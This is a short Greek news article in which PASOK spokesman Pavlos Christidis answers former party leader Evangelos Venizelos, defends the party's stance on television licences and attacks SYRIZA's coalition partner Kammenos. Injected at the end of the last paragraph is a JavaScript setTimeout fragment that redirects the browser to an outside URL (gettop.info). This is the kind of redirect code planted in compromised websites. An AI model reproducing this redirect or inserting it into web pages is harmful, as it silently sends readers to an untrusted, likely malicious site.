ΠΑΣΟΚ για Βενιζέλο: Κλήθηκε στο συντονιστικό της ΚΟ και απουσίαζε

0
7

 

Χαμηλούς τόνους κράτησε ο εκπρόσωπος Τύπου του ΠΑΣΟΚ, Παύλος Χρηστίδης, απέναντι στα όσα είπε ο πρώην πρέοδρος του ΠΑΣΟΚ Ευάγγελος Βενιζέλος.

Μιλώντας στον τηλεοπτικό σταθμό ΣΚΑΪ, ανέφερε ότι την περασμένη Τρίτη συγκλήθηκε το συντονιστικό της Κ.Ο. της Δημοκρατικής Συμπαράταξης, όπου ομόφωνα αποφασίστηκε από τους βουλευτές η στάση που θα κρατούσαν στη χθεσινή συζήτηση.
«Ο κ. Βενιζέλος κλήθηκε στο συντονιστικό της ΚΟ και απουσίαζε», σημείωσε. Επιπλέον, τόνισε ότι «με τις αριστοτεχνικές κινήσεις του κ. Λοβέρδου αναγκάστηκε η κυβέρνηση να κάνει πίσω, υπέστη μία τεράστια ήττα κι αυτό είναι το μείζον, ότι το ΕΣΡ θα είναι το υπεύθυνο για τις άδειες».

Σχετικά με το ευρύτερο ζήτημα της στρατηγικής πορείας της Κεντροαριστεράς, ο εκπρόσωπος Τύπου του ΠΑΣΟΚ επισήμανε ότι «όλα τα συλλογικά μας όργανα έχουν πάρει απόφαση για έναν αυτόνομο πόλο στην Κεντροαριστερά, με ουσιαστική πολιτική και ιδεολογική τοποθέτηση. Και αυτήν την απόφαση πρέπει να υπερασπιστούμε όλοι συλλογικά και όχι να κατατριβόμαστε σε προσωπικές πολιτικές».

Στη συνέχεια, υπογράμμισε ότι «ο ΣΥΡΙΖΑ δεν θα πρέπει να ξεχνά τι σημαίνει δεξιά, ενώ συγκυβερνά με τον απολύτως ακροδεξιό, με τον κ. Καμμένο και με τον κ. Δημήτρη Καμμένο, ο οποίος στήριζε την κατάληψη στον Βοτανικό, αθώωσαν τον κ. Νικολόπουλο μαζί με κομμάτι της Νέας Δημοκρατίας στο ζήτημα της απίστευτης επίθεσης ενάντια στους ομοφυλόφιλους, την οποία εξαπέλυσε».

«Ο ΣΥΡΙΖΑ κάθε άλλο παρά προοδευτική δύναμη είναι. Εμείς έχουμε μάθει να έχουμε στρατηγική αυτόνομης πορείας και σε αυτήν την πορεία δεν λειτουργούμε με βάση την επικοινωνιακή πολιτική μίας μέρας και δεν μπορούμε να κρύβουμε στον κόσμο τα προβλήματα, κάτω από μία δήθεν σύγκρουση που αφορά τις τηλεοπτικές άδειες», πρόσθεσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here